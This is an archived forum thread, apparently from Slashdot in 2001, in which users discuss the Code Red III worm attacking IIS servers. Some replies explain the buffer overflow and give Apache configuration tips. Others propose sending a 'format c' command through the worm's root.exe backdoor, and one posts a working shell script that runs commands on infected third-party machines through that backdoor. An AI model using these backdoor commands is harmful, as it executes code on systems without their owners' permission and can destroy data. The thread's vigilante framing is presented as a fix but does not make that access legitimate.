Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

Re:An ETHICAL way to Anti-Virus

[nitehorse]

Actually, if you add a line in your httpd.conf that looks like this:

AddHandler cgi-script .ida

then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

AddType application/x-httpd-php .php .php3 .ida

Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

-Chris

Re:More information?

[ncc74656]

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

#!/bin/sh
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
+h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done

Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

The Code Red hype Hall of Shame

[wiredog]

From The Register

Public Logfile - for *Educational* Purposes Only

[BigBlockMopar]

I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?

Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a bliterhing idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

Re:Help me out on this one...

[DeadMeat+(TM)]

Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.

Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.

I think you're on to something...

[Nate+Fox]

According to Symantec's page on CR2:

Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C